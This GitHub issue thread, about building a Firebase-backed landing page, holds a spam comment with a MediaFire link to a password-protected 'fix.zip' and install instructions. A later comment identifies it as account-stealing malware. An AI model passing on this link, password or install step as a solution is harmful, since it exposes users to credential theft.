### ISSUE TITLE
Landing-Page Backend

### ISSUE THREAD

**Issue by rampravesh9991** [rampravesh9991/Server-Strikers_024#12]
- [ ] use firebase server
- [ ] make it dynamic 
- [ ] multiple users data

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by caineblood** [comment]
The above comment asking you to download a file is malware to steal your account; do not under any circumstances download or run it. The post needs to be removed. If you have attempted to run it please have your system cleaned and your account secured immediately.
